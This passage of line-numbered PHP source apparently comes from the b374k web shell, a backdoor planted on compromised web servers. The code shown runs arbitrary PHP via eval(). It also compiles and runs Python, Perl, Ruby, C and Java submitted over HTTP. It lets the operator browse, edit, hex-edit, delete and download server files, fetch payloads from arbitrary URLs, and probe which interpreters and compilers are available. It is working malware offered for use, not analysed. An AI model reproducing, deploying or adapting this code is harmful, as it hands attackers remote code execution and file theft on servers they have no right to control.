853 $letters .= "<a href='".$s_self."cd=".$letter.":\\'>[ ";
854 if ($letter.":" != $v) {$letters .= $letter;}
855 else {$letters .= "<span style='color:#fff;'>".$letter."</span>";}
856 $letters .= " ]</a> ";
857 }
858 }
859 }
860 // prompt style..
861 $s_prompt = $s_user." >";
862 // check for posix
863 $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
864 // server ip
865 $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
866 // your ip ;-)
867 $s_my_ip = $_SERVER['REMOTE_ADDR'];
868 $s_result = "";
869
870 global $s_python, $s_perl, $s_ruby, $s_gcc, $s_java, $s_tar;
871 // check python
872 if(isset($_COOKIE['s_python'])){$s_python = $_COOKIE['s_python'];}
873 else{
874 $s_python = check_access("python");
875 setcookie("s_python", $s_python ,time() + $s_login_time);
876 }
877 $s_python = ($s_python=="1")?true:false;
878
879 // check perl
880 if(isset($_COOKIE['s_perl'])){$s_perl = $_COOKIE['s_perl'];}
881 else{
882 $s_perl = check_access("perl");
883 setcookie("s_perl", $s_perl ,time() + $s_login_time);
884 }
885 $s_perl = ($s_perl=="1")?true:false;
886
887 // check ruby
888 if(isset($_COOKIE['s_ruby'])){$s_ruby = $_COOKIE['s_ruby'];}
889 else{
890 $s_ruby = check_access("ruby");
891 setcookie("s_ruby", $s_ruby ,time() + $s_login_time);
892 }
893 $s_ruby = ($s_ruby=="1")?true:false;
894
895 // check gcc
896 if(isset($_COOKIE['s_gcc'])){$s_gcc = $_COOKIE['s_gcc'];}
897 else{
898 $s_gcc = check_access("gcc");
899 setcookie("s_gcc", $s_gcc ,time() + $s_login_time);
900 }
901 $s_gcc = ($s_gcc=="1")?true:false;
902
903 // check java
904 if(isset($_COOKIE['s_java'])){$s_java = $_COOKIE['s_java'];}
905 else{
906 $s_java = check_access("java");
907 setcookie("s_java", $s_java ,time() + $s_login_time);
908 }
909 $s_java = ($s_java=="1")?true:false;
910
911 // check tar
912 if(isset($_COOKIE['s_tar'])){$s_tar = $_COOKIE['s_tar'];}
913 else{
914 $s_tar = check_access("tar");
915 setcookie("s_tar", $s_tar ,time() + $s_login_time);
916 }
917 $s_tar = ($s_tar=="1")?true:false;
918
919 // sorttable.js
920 if(isset($_REQUEST['sorttable'])){
921 $data = gzinflate(base64_decode($sortable_js));
922 header("Content-type: text/javascript");
923 header("Cache-control: public");
924 echo $data;
925 exit;
926 }
927 if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){
928 $dltype = ss($_REQUEST['dltype']);
929 $dlpath = ss($_REQUEST['dlpath']);
930
931 $dlname = basename($dlpath);
932 if($dlpath==".") $dlname=basename($cwd);
933 elseif($dlpath==".."){
934 chdir("..");
935 $dlname=basename(getcwd());
936 chdir($cwd);
937 }
938 $tmpdir = get_writabledir();
939 $dlarchive = $tmpdir.$dlname;
940 $dlthis = "";
941 if($dltype=="ziparchive"){
942 $dlarchive .= ".zip";
943 if(zip($dlpath,$dlarchive)){
944 $dlthis = $dlarchive;
945 }
946 }
947 elseif($dltype=="tar"){
948 $dlarchive .= ".tar";
949 $dlarchive = str_replace('\\', '/', $dlarchive);
950 exe("tar cf ".$dlarchive." ".$dlpath);
951 $dlthis = $dlarchive;
952 }
953 elseif($dltype=="targz"){
954 $dlarchive .= ".tar.gz";
955 $dlarchive = str_replace('\\', '/', $dlarchive);
956 exe("tar czf ".$dlarchive." ".$dlpath);
957 $dlthis = $dlarchive;
958 }
959 elseif($dltype=="raw"){
960 if(is_file($dlpath)) $dlthis = $dlpath;
961 }
962
963 if(is_file($dlthis)){
964 header("Content-Type: application/octet-stream");
965 header('Content-Transfer-Encoding: binary');
966 header("Content-length: ".@filesize($dlthis));
967 header("Content-disposition: attachment; filename=\"".basename($dlthis)."\";");
968 $file = @fopen($dlthis,"rb");
969 while(!feof($file)){
970 print(@fread($file, 1024*8));
971 ob_flush();
972 flush();
973 }
974 fclose($file);
975
976 if($dltype!="raw"){
977 rename($dlthis,$dlthis."del");
978 unlink($dlthis."del");
979 }
980 exit;
981 }
982 }
983 // view image specified by ?img=<file>
984 if(isset($_REQUEST['img'])){
985 ob_clean();
986 $d = ss($_REQUEST['d']);
987 $f = ss($_REQUEST['img']);
988 $inf = @getimagesize($d.$f);
989 $ext = explode($f,".");
990 $ext = $ext[count($ext)-1];
991 header("Content-type: ".$inf["mime"]);
992 header("Cache-control: public");
993 header("Expires: ".@date("r",@mktime(0,0,0,1,1,2030)));
994 header("Cache-control: max-age=".(60*60*24*7));#
995 readfile($d.$f);
996 exit;
997 }
998
999 // rename file or folder
1000 if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
1001 $old = ss($_REQUEST['oldname']);
1002 $new = ss($_REQUEST['newname']);
1003
1004 $renmsg = "";
1005 if(is_dir($old)) $renmsg = (@rename($cwd.$old,$cwd.$new)) ? "Directory ".$old." renamed to ".$new : "Unable to rename directory ".$old." to ".$new;
1006 elseif(is_file($old)) $renmsg = (@rename($cwd.$old,$cwd.$new)) ? "File ".$old." renamed to ".$new : "Unable to rename file ".$old." to ".$new;
1007 else $renmsg = "Cannot find the path specified ".$old;
1008
1009 $s_result .= "<p class='notif'>".$renmsg."</p>";
1010 $fnew = $cwd.$new;
1011 }
1012
1013 // confirm delete
1014 if(!empty($_REQUEST['del'])){
1015 $del = trim($_REQUEST['del']);
1016 $s_result .= "<p class='notif'>Delete ".basename($del)." ? <a href='".$s_self."delete=".$del."'>Yes</a> | <a href='".$s_self."'>No</a></p>";
1017 }// delete file
1018 elseif(!empty($_REQUEST['delete'])){
1019 $f = ss($_REQUEST['delete']);
1020 $delmsg = "";
1021 if(is_file($f)){
1022 $delmsg = (unlink($f)) ? "File removed : ".$f : "Unable to remove file ".$f;
1023 }
1024 elseif(is_dir($f)){
1025 rmdirs($f);
1026 $delmsg = (is_dir($f)) ? "Unable to remove directory ".$f : "Directory removed : ".$f;
1027 }
1028 else $delmsg = "Cannot find the path specified ".$f;
1029 $s_result .= "<p class='notif'>".$delmsg."</p>";
1030 } // create dir
1031 elseif(!empty($_REQUEST['mkdir'])){
1032 $f = ss($cwd.ss($_REQUEST['mkdir']));
1033 $dirmsg = "";
1034 if(!is_dir($f)){
1035 mkdir($f);
1036 if(is_dir($f)) $dirmsg = "Directory created ".$f;
1037 else $dirmsg = "Unable to create directory ".$f;
1038 }
1039 else $dirmsg = "Directory already exists ".$f;
1040 $s_result .= "<p class='notif'>".$dirmsg."</p>";
1041 }
1042
1043 // php eval() function
1044 if(isset($_REQUEST['eval'])){
1045 $code = "";
1046 $res = "";
1047 $gccoption = "";
1048 $lang = "php";
1049
1050 if(isset($_REQUEST['evalcode'])){
1051 $code = ssc($_REQUEST['evalcode']);
1052 $gccoption = (isset($_REQUEST['gccoption']))? " ".ssc($_REQUEST['gccoption']):"";
1053 $tmpdir = get_writabledir();
1054
1055 if(isset($_REQUEST['lang'])){$lang = $_REQUEST['lang'];}
1056
1057 if(strtolower($lang)=='php'){
1058 ob_start();
1059 eval($code);
1060 $res = ob_get_contents();
1061 ob_end_clean();
1062 }
1063 elseif(strtolower($lang)=='python'||strtolower($lang)=='perl'||strtolower($lang)=='ruby'){
1064 $rand = md5(time().rand(0,100));
1065 $script = $tmpdir.$rand;
1066 file_put_contents($script, $code);
1067 if(is_file($script)){
1068 $res = exe($lang." ".$script.$gccoption);
1069 unlink($script);
1070 }
1071 }
1072 elseif(strtolower($lang)=='gcc'){
1073 $script = md5(time().rand(0,100));
1074 chdir($tmpdir);
1075 file_put_contents($script.".c", $code);
1076 if(is_file($script.".c")){
1077 $scriptout = $s_win ? $script.".exe" : $script;
1078 $res = exe("gcc ".$script.".c -o ".$scriptout.$gccoption);
1079 if(is_file($scriptout)){
1080 $res = $s_win ? exe($scriptout) : exe("chmod +x ".$scriptout." ; ./".$scriptout);
1081 rename($scriptout, $scriptout."del");
1082 unlink($scriptout."del");
1083 }
1084 unlink($script.".c");
1085 }
1086 chdir($cwd);
1087 }
1088 elseif(strtolower($lang)=='java'){
1089 if(preg_match("/class\ ([^{]+){/i",$code, $r)){
1090 $classname = trim($r[1]);
1091 $script = $classname;
1092 }
1093 else{
1094 $rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
1095 $script = $rand;
1096 $code = "class ".$rand." { ".$code . " } ";
1097 }
1098 chdir($tmpdir);
1099 file_put_contents($script.".java", $code);
1100 if(is_file($script.".java")){
1101 $res = exe("javac ".$script.".java");
1102 if(is_file($script.".class")){
1103 $res .= exe("java ".$script.$gccoption);
1104 unlink($script.".class");
1105 }
1106 unlink($script.".java");
1107 }
1108 chdir($pwd);
1109 }
1110 }
1111
1112 $lang_available = "<option value='php'>php</option>";
1113 $selected = "";
1114 if($s_python){
1115 $checked = ($lang == "python") ? "selected" : "";
1116 $lang_available .= "<option value='python' ".$checked.">python</option>";
1117 }
1118 if($s_perl){
1119 $checked = ($lang == "perl") ? "selected" : "";
1120 $lang_available .= "<option value='perl' ".$checked.">perl</option>";
1121 }
1122 if($s_ruby){
1123 $checked = ($lang == "ruby") ? "selected" : "";
1124 $lang_available .= "<option value='ruby' ".$checked.">ruby</option>";
1125 }
1126 if($s_gcc){
1127 $checked = ($lang == "gcc") ? "selected" : "";
1128 $lang_available .= "<option value='gcc' ".$checked.">c</option>";
1129 }
1130 if($s_java){
1131 $checked = ($lang == "java") ? "selected" : "";
1132 $lang_available .= "<option value='java' ".$checked.">java</option>";
1133 }
1134 $gccoptionclass = ($lang=="php")? "sembunyi":"";
1135 $e_result = (!empty($res)) ? "<pre id='evalres' style='border-top:1px solid #393939;margin:4px 0 0 0;padding:6px 0;' >".hss($res)."</pre>":"";
1136 $s_result .= "<form action='".$s_self."' method='post'>
1137 <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>".hss($code)."</textarea>
1138 <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>
1139 </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>
1140 ".$lang_available."
1141 </select>
1142 </td>
1143 <td><div id='additionaloption' class='".$gccoptionclass."'>Additional option<input class='inputz' style='width:400px;' type='text' name='gccoption' value='".hss($gccoption)."' title='If you want to give additional option to interpreter or compiler, give it here' id='gccoption' /></div></td>
1144 </tr>
1145 </table>
1146 ".$e_result."
1147 <input type='hidden' name='eval' value='' />
1148 </form>
1149 ";
1150 }
1151 // find
1152 elseif(isset($_REQUEST['find'])){
1153 $p = cp($_REQUEST['find']);
1154
1155 $type = isset($_REQUEST['type']) ? $_REQUEST['type'] : "sfile";
1156 $sfname = (!empty($_REQUEST['sfname']))?ssc($_REQUEST['sfname']):'';
1157 $sdname = (!empty($_REQUEST['sdname']))?ssc($_REQUEST['sdname']):'';
1158 $sfcontain = (!empty($_REQUEST['sfcontain']))?ssc($_REQUEST['sfcontain']):'';
1159
1160 $sfnameregexchecked=$sfnameicasechecked=$sdnameregexchecked=$sdnameicasechecked=$sfcontainregexchecked=$sfcontainicasechecked=$swritablechecked=$sreadablechecked=$sexecutablechecked="";
1161 $sfnameregex=$sfnameicase=$sdnameregex=$sdnameicase=$sfcontainregex=$sfcontainicase=$swritable=$sreadable=$sexecutable=false;
1162
1163 if(isset($_REQUEST['sfnameregex'])){$sfnameregex=true;$sfnameregexchecked="checked";}
1164 if(isset($_REQUEST['sfnameicase'])){$sfnameicase=true;$sfnameicasechecked="checked";}
1165 if(isset($_REQUEST['sdnameregex'])){$sdnameregex=true;$sdnameregexchecked="checked";}
1166 if(isset($_REQUEST['sdnameicase'])){$sdnameicase=true;$sdnameicasechecked="checked";}
1167 if(isset($_REQUEST['sfcontainregex'])){$sfcontainregex=true;$sfcontainregexchecked="checked";}
1168 if(isset($_REQUEST['sfcontainicase'])){$sfcontainicase=true;$sfcontainicasechecked="checked";}
1169 if(isset($_REQUEST['swritable'])){$swritable=true;$swritablechecked="checked";}
1170 if(isset($_REQUEST['sreadable'])){$sreadable=true;$sreadablechecked="checked";}
1171 if(isset($_REQUEST['sexecutable'])){$sexecutable=true;$sexecutablechecked="checked";}
1172
1173 $sexecb = (function_exists("is_executable")) ? "<input type='checkbox' name='sexecutable' value='sexecutable' id='se' ".$sexecutablechecked." /><label for='se'>Executable</span>":"";
1174
1175 $candidate = array();
1176 if(isset($_REQUEST['sgo'])){
1177 $af = "";
1178
1179 $candidate = getallfiles($p);
1180 if($type=='sfile') $candidate = array_filter($candidate, "is_file");
1181 elseif($type=='sdir') $candidate = array_filter($candidate, "is_dir");
1182
1183 foreach($candidate as $a){
1184 if($type=='sdir'){
1185 if(!empty($sdname)){
1186 if($sdnameregex){
1187 if($sdnameicase){if(!preg_match("/".$sdname."/i", basename($a))) $candidate = array_diff($candidate,array($a));}
1188 else{if(!preg_match("/".$sdname."/", basename($a))) $candidate = array_diff($candidate,array($a));}
1189 }
1190 else{
1191 if($sdnameicase){if(strpos(strtolower(basename($a)),strtolower($sdname))===false) $candidate = array_diff($candidate,array($a));}
1192 else{if(strpos(basename($a),$sdname)===false) $candidate = array_diff($candidate,array($a));}
1193 }
1194 }
1195 }
1196 elseif($type=='sfile'){
1197 if(!empty($sfname)){
1198 if($sfnameregex){
1199 if($sfnameicase){if(!preg_match("/".$sfname."/i", basename($a))) $candidate = array_diff($candidate,array($a));}
1200 else{if(!preg_match("/".$sfname."/", basename($a))) $candidate = array_diff($candidate,array($a));}
1201 }
1202 else{
1203 if($sfnameicase){if(strpos(strtolower(basename($a)),strtolower($sfname))===false) $candidate = array_diff($candidate,array($a));}
1204 else{if(strpos(basename($a),$sfname)===false) $candidate = array_diff($candidate,array($a));}
1205 }
1206 }
1207 if(!empty($sfcontain)){
1208 $sffcontent = @file_get_contents($a);
1209 if($sfcontainregex){
1210 if($sfcontainicase){if(!preg_match("/".$sfcontain."/i", $sffcontent)) $candidate = array_diff($candidate,array($a));}
1211 else{if(!preg_match("/".$sfcontain."/", $sffcontent)) $candidate = array_diff($candidate,array($a));}
1212 }
1213 else{
1214 if($sfcontainicase){if(strpos(strtolower($sffcontent),strtolower($sfcontain))===false) $candidate = array_diff($candidate,array($a));}
1215 else{if(strpos($sffcontent,$sfcontain)===false) $candidate = array_diff($candidate,array($a));}
1216 }
1217 }
1218 }
1219 }
1220 }
1221
1222 $f_result = "";$link="";
1223 foreach($candidate as $c){
1224 $c=trim($c);
1225 if($swritable && !is_writable($c)) continue;
1226 if($sreadable && !is_readable($c)) continue;
1227 if($sexecutable && !is_executable($c)) continue;
1228 if($type=="sfile") $link = $s_self."cd=".cp(dirname($c))."&view=".basename($c);
1229 elseif($type=="sdir") $link = $s_self."cd=".cp($c);
1230 $f_result .= "<p class='notif' onmouseup=\"return go('".addslashes($link)."',event);\"><a href='".$link."' target='_blank'>".$c."</a></p>";
1231 }
1232
1233 $tsdir = ($type=="sdir")? "selected":"";
1234 $tsfile = ($type=="sfile")? "selected":"";
1235
1236 if(!is_dir($p)) $s_result .= "<p class='notif'>Cannot find the path specified ".$p."</p>";
1237 $s_result .= "<form action='".$s_self."' method='post'>
1238 <div class='mybox'><h2>Find</h2>
1239 <table class='myboxtbl'>
1240 <tr><td style='width:140px;'>Search in</td>
1241 <td colspan='2'><input style='width:100%;' value='".hss($p)."' class='inputz' type='text' name='find' /></td></tr>
1242 <tr onclick=\"findtype('sdir');\">
1243 <td>Dirname contains</td>
1244 <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='".hss($sdname)."' /></td>
1245 <td>
1246 <input type='checkbox' name='sdnameregex' id='sdn' ".$sdnameregexchecked." /><label for='sdn'>Regex (pcre)</label>
1247 <input type='checkbox' name='sdnameicase' id='sdi' ".$sdnameicasechecked." /><label for='sdi'>Case Insensitive</label>
1248 </td>
1249 </tr>
1250 <tr onclick='findtype('sfile');'>
1251 <td>Filename contains</td>
1252 <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='".hss($sfname)."' /></td>
1253 <td>
1254 <input type='checkbox' name='sfnameregex' id='sfn' ".$sfnameregexchecked." /><label for='sfn'>Regex (pcre)</label>
1255 <input type='checkbox' name='sfnameicase' id='sfi' ".$sfnameicasechecked." /><label for='sfi'>Case Insensitive</label>
1256 </td>
1257 </tr>
1258 <tr onclick=\"findtype('sfile');\">
1259 <td>File contains</td>
1260 <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='".hss($sfcontain)."' /></td>
1261 <td>
1262 <input type='checkbox' name='sfcontainregex' id='sff' ".$sfcontainregexchecked." /><label for='sff'>Regex (pcre)</label>
1263 <input type='checkbox' name='sfcontainicase' id='sffi' ".$sfcontainicasechecked." /><label for='sffi'>Case Insensitive</label>
1264 </td>
1265 </tr>
1266 <tr>
1267 <td>Permissions</td>
1268 <td colspan='2'>
1269 <input type='checkbox' name='swritable' id='sw' ".$swritablechecked." /><label for='sw'>Writable</label>
1270 <input type='checkbox' name='sreadable' id='sr' ".$sreadablechecked." /><label for='sr'>Readable</label>
1271 ".$sexecb."
1272 </td>
1273 </tr>
1274 <tr><td colspan='3'>
1275 <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1276 <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:10px 2px 0 2px;'>
1277 <option value='sfile' ".$tsfile.">Search file</option>
1278 <option value='sdir' ".$tsdir.">Search dir</option>
1279 </select>
1280 </td></tr>
1281 </table>
1282 </div>
1283 </form>
1284 <div>
1285 ".$f_result."
1286 </div>
1287 ";
1288 }
1289 // upload !
1290 elseif(isset($_REQUEST['upload'])){
1291 $s_result = " ";
1292 $msg = "";
1293 if(isset($_REQUEST['uploadhd'])){
1294 $fn = $_FILES['filepath']['name'];
1295 if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
1296 $p = cp(ss($_REQUEST['savefolder']));
1297 if(!is_dir($p)) $p = cp(dirname($p));
1298 if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
1299 $tm = $_FILES['filepath']['tmp_name'];
1300 $pi = cp($p).$fn;
1301 $st = @move_uploaded_file($tm,$pi);
1302 if($st) $msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".basename($pi)."'>".$pi."</a></p>";
1303 else $msg = "<p class='notif'>Failed to upload ".$fn."</p>";
1304 }
1305 else $msg = "<p class='notif'>Failed to upload ".$fn."</p>";
1306 }
1307 elseif(isset($_REQUEST['uploadurl'])){
1308 // function dlfile($url,$fpath){
1309 $p = cp(ss($_REQUEST['savefolderurl']));
1310 if(!is_dir($p)) $p = cp(dirname($p));
1311 $fu = ss($_REQUEST['fileurl']);
1312 $fn = basename($fu);
1313 if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
1314 $fp = cp($p).$fn;
1315 $st = dlfile($fu,$fp);
1316 if($st) $msg = "<p class='notif'>File uploaded to <a href='".$s_self."view=".basename($fp)."'>".$fp."</a></p>";
1317 else $msg = "<p class='notif'>Failed to upload ".$fn."</p>";
1318 }
1319 else{
1320 if(!is_writable($cwd)) $msg = "<p class='notif'>Directory ".$cwd." is not writable, please change to a writable one</p>";
1321 }
1322
1323 if(!empty($msg)) $s_result .= $msg;
1324 $s_result .= "
1325 <form action='".$s_self."upload' method='post' enctype='multipart/form-data'>
1326 <div class='mybox'><h2>Upload from computer</h2>
1327 <table class='myboxtbl'>
1328 <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath' class='inputzbut' style='width:400px;margin:0;' />
1329 </td></tr>
1330 <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder' value='".$cwd."' /></td></tr>
1331 <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename' value='' /></td></tr>
1332 <tr><td> </td><td>
1333 <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1334 </td></tr>
1335 </table>
1336 </div>
1337 </form>
1338 <form action='".$s_self."upload' method='post'>
1339 <div class='mybox'><h2>Upload from internet</h2>
1340 <table class='myboxtbl'>
1341 <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl' value='' />
1342 </td></tr>
1343 <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl' value='".$cwd."' /></td></tr>
1344 <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl' value='' /></td></tr>
1345 <tr><td> </td><td>
1346 <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
1347 </td></tr>
1348 </table>
1349 </div>
1350 </form>
1351 ";
1352 } // view file
1353 elseif(isset($_REQUEST['view'])){
1354 $f = ss($_REQUEST['view']);
1355 if(isset($fnew) && (trim($fnew)!="")) $f = $fnew;
1356 $owner = "";
1357 if(is_file($f)){
1358 if(!$s_win && $s_posix){
1359 $name = posix_getpwuid(fileowner($f));
1360 $group = posix_getgrgid(filegroup($f));
1361 $owner = "<tr><td>Owner</td><td>".$name['name']."<span class='gaya'> : </span>".$group['name']."</td></tr>";
1362 }
1363 $filn = basename($f);
1364 $dlfile = get_archiver_available();
1365 $dlfile = str_replace("__dlpath__",$filn,$dlfile);
1366 $dlfile = str_replace("__dlcwd__",$cwd,$dlfile);
1367 $s_result .= "<table class='viewfile' style='width:100%;'>
1368 <tr><td style='width:140px;'>Filename</td><td><span id='".cs($filn)."_link'>".$filn."</span>
1369 <div id='".cs($filn)."_form' class='sembunyi'>
1370 <form action='".$s_self."view=".basename($f)."' method='post'>
1371 <input type='hidden' name='oldname' value='".$filn."' style='margin:0;padding:0;' />
1372 <input class='inputz' style='width:200px;' type='text' name='newname' value='".$filn."' />
1373 <input class='inputzbut' type='submit' name='rename' value='rename' />
1374 </form>
1375 <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($filn)."_form','".cs($filn)."_link');\" />
1376 </div>
1377 </td></tr>
1378 <tr><td>Size</td><td>".gs($f)." (".@filesize($f).")</td></tr>
1379 <tr><td>Permission</td><td>".gp($f)."</td></tr>
1380 ".$owner."
1381 <tr><td>Create time</td><td>".@date("d-M-Y H:i",filectime($f))."</td></tr>
1382 <tr><td>Last modified</td><td>".@date("d-M-Y H:i",filemtime($f))."</td></tr>
1383 <tr><td>Last accessed</td><td>".@date("d-M-Y H:i",fileatime($f))."</td></tr>
1384 <tr><td>Actions</td><td>
1385 <a href='".$s_self."edit=".realpath($f)."' title='edit'>edit</a> |
1386 <a href='".$s_self."hexedit=".realpath($f)."' title='edit as hex'>hex</a> |
1387 <a href=\"javascript:tukar('".cs($filn)."_link','".cs($filn)."_form');\" title='rename'>ren</a> |
1388 <a href='".$s_self."del=".$filn."' title='delete'>del</a> ".$dlfile."
1389 </td></tr>
1390 <tr><td>View</td><td>
1391 <a href='".$s_self."view=".$filn."&type=text'>text</a> |
1392 <a href='".$s_self."view=".$filn."&type=code'>code</a> |
1393 <a href='".$s_self."view=".$filn."&type=image'>image</a></td></tr>
1394 </table>
1395 ";
1396
1397 $t = "";
1398 $iinfo = @getimagesize($f);
1399 if(substr($filn,-3,3) == "php") $t = "code";
1400 if(is_array($iinfo)) $t = 'image';
1401
1402 if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
1403
1404 if($t=="image"){
1405 $width = (int) $iinfo[0];
1406 $height = (int) $iinfo[1];
1407 $imginfo = "Image type = ( ".$iinfo['mime']." )<br />
1408 Image Size = <span class='gaul'>( </span>".$width." x ".$height."<span class='gaul'> )</span><br />";
1409 if($width > 800){
1410 $width = 800;
1411 $imglink = "<p><a href='".$s_self."img=".$filn."' target='_blank'>
1412 <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
1413 }
1414 else $imglink = "";
1415
1416 $s_result .= "<div class='viewfilecontent' style='text-align:center;'>".$imglink."
1417 <img width='".$width."' src='".$s_self."img=".$filn."' alt='".$filn."' style='margin:8px auto;padding:0;border:0;' /></div>";
1418
1419 }
1420 elseif($t=="code"){
1421 $s_result .= "<div class=\"viewfilecontent\">";
1422 $file = wordwrap(@file_get_contents($f),160,"\n",true);
1423 $buff = highlight_string($file,true);
1424 $old = array("0000BB","000000","FF8000","DD0000", "007700");
1425 $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
1426 $buff = str_replace($old,$new, $buff);
1427 $s_result .= $buff;
1428 $s_result .= "</div>";
1429 }
1430 else {
1431 $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
1432 $s_result .= str_replace("<","<",str_replace(">",">",(wordwrap(@file_get_contents($f),160,"\n",true))));
1433 $s_result .= "</pre>";
1434 }
1435 }
1436 elseif(is_dir($f)){
1437 chdir($f);
1438 $cwd = cp(getcwd());
1439 $s_result .= showdir($cwd);
1440 }
1441 else $s_result .= "<p class='notif'>Cannot find the path specified ".$f."</p>";
1442
1443 } // edit file
1444 elseif(isset($_REQUEST['edit'])){
1445 $f = ss($_REQUEST['edit']);
1446 $fc = "";
1447 $fcs = "";
1448
1449 if(isset($_REQUEST['new'])){
1450 $num = 1;
1451 if(is_file($f)){
1452 $pos = strrpos($f,"_");
1453 if($pos!==false) $num = (int) substr($f,$pos+1);
1454 while(is_file(substr($f,0,$pos)."_".$num)){
1455 $num++;
1456 }
1457 $f = substr($f,0,$pos)."_".$num;
1458 }
1459 }
1460 else if(is_file($f)) $fc = @file_get_contents($f);
1461
1462
1463 if(isset($_REQUEST['fc'])){
1464 $fc = ssc($_REQUEST['fc']);
1465 if($filez = fopen($f,"w")){
1466 $time = @date("d-M-Y H:i",time());
1467 if(fwrite($filez,$fc)!==false) $fcs = "File saved @ ".$time;
1468 else $fcs = "Failed to save";
1469 fclose($filez);
1470 }
1471 else $fcs = "Permission denied";
1472 }
1473 else if(is_file($f) && !is_writable($f)) $fcs = "This file is not writable";
1474
1475 if(!empty($fcs)) $s_result .= "<p class='notif'>".$fcs."</p>";
1476 $s_result .= "<form action='".$s_self."' method='post'>
1477 <textarea id='fc' name='fc' class='txtarea'>".hss($fc)."</textarea>
1478 <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='".$f."' /></p>
1479 <p><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>
1480 </form>";
1481
1482 }// hex edit file
1483 elseif(isset($_REQUEST['hexedit'])){
1484 $f = ss($_REQUEST['hexedit']);
1485 $fc = "";
1486 $fcs = "";
1487 $lnum = 0;
1488 $hexes = "";
1489
1490 if(!empty($_REQUEST['hexes']) || !empty($_REQUEST['hexestxtarea'])){
1491 if(!empty($_REQUEST['hexes'])){
1492 foreach($_REQUEST['hexes'] as $hex) $hexes .= str_replace(" ","", $hex);
1493 }
1494 elseif(!empty($_REQUEST['hexestxtarea'])){
1495 $hexes = trim($_REQUEST['hexestxtarea']);
1496 }
1497 if($filez = fopen($f,"w")){
1498 $bins = pack("H*" , $hexes);
1499 $time = @date("d-M-Y H:i",time());
1500 if(fwrite($filez,$bins)!==false) $fcs = "File saved @ ".$time;
1501 else $fcs = "Failed to save";
1502 fclose($filez);
1503 }
1504 else $fcs = "Permission denied";
1505 }
1506 else if(is_file($f) && !is_writable($f)) $fcs = "This file is not writable";
1507
1508 if(!empty($fcs)) $s_result .= "<p class='notif'>".$fcs."</p>";
1509 $s_result .= "<form action='".$s_self."' method='post'>
1510 <p style='padding:0;text-align:center;'><input type='text' class='inputz' style='width:99%;' name='hexedit' value='".$f."' /></p>
1511 <p style='padding:0 0 14px 0;border-bottom:1px solid #393939;'><input type='submit' name='fcsubmit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return submithex();\" /></p>
1512 <table class='explore'>
1513 ";
1514 if(is_file($f)){
1515 $fp = fopen($f,"r");
1516 if($fp) {
1517 $ldump = "";
1518 $counter = 0;
1519 $icounter = 0;
1520 while(!feof($fp)){
1521 $line = fread($fp, 32);
1522 $linedump = preg_replace('/[^\x21-\x7E]/','.', $line);
1523 $linehex = strtoupper(bin2hex($line));
1524 $linex = str_split($linehex,2);
1525 $linehex = implode(" ", $linex);
1526 $addr = sprintf("%08xh",$icounter);
1527
1528 $s_result .= "<tr><td style='text-align:center;width:60px;'>".$addr."</td><td style='text-align:left;width:580px;'>
1529 <input onclick=\"hexupdate('".$counter."',event);\" onkeydown=\"return hexfix('".$counter."',event);\" onkeyup=\"hexupdate('".$counter."',event);\" type='text' class='inputz' id='hex_".$counter."' name='hexes[]' value='".$linehex."' style='width:570px;' maxlength='".strlen($linehex)."' /></td>
1530 <td style='text-align:left;letter-spacing:2px;' name='hexdump' id='dump_".$counter."'>".hss($linedump)."</td></tr>";
1531 $counter++;
1532 $icounter+=32;
1533 }
1534 $s_result .= "<input type='hidden' id='counter' value='".$counter."' />";
1535 $s_result .= "<textarea name='hexestxtarea' id='hexestxtarea' class='sembunyi'></textarea>";
1536 fclose($fp);
1537 }
1538 }
1539 $s_result .= "</table></form>";
1540
1541 }// show server information
1542 elseif(isset($_REQUEST['info'])){
1543 $s_result = "";
1544 // server misc info
1545 $s_result .= "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
1546 $s_result .= "<div class='info' id='info_server'><table>";
1547
1548 if($s_win){
1549 foreach (range("A","Z") as $letter){
1550 if((is_dir($letter.":\\") && is_readable($letter.":\\"))){
1551 $drive = $letter.":";
